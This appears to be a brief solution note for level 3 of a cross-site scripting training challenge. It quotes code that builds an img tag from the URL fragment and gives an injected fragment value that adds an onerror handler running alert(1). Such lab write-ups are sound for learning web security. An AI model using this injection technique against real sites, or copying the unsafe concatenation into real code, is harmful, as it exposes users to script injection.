level 3

In level.py, we observe:

html += "<img src='/static/level3/cloud" + num + ".jpg' />";

where num is the segment after # in url

Edit the URL:

' onerror='alert(1)'><img src='